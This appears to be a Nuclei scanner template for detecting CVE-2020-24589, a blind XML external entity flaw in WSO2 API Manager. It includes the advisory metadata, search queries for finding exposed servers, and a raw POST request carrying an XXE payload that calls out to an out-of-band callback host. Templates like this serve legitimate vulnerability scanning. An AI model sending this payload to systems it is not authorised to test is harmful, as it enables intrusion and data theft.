id: CVE-2020-24589

info:
  name: WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection
  author: lethargynavigator
  severity: critical
  description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system and to interact with any backend or external systems that the application itself can access, which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, denial of service, or server-side request forgery.
  remediation: |
    Upgrade to a patched version of WSO2 API Manager (3.1.1 or above) or apply the provided security patch.
  reference:
    - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24589
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/athiththan11/WSO2-CVE-Extractor
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2020-24589
    cwe-id: CWE-611
    epss-score: 0.64778
    epss-percentile: 0.97891
    cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wso2
    product: api_manager
    shodan-query: http.favicon.hash:1398055326
    fofa-query: icon_hash=1398055326
    google-query: inurl:"carbon/admin/login"
  tags: cve2020,cve,wso2,xxe,oast,blind

http:
  - raw:
      - |
        POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        payload=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+"http%3a//{{interactsh-url}}">%25xxe%3b]>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - "Failed to install the generic artifact type"
# digest: 4a0a00473045022100a46002c04b61e32de82a96a52b9b729882e74fa21aaaea3fc4c33bac965f7897022010b04d7670233afd72f3ee1137579adc1b40f09a0b771f769deba4e19d5069e1:922c64590222798bb761d5b6d8e72950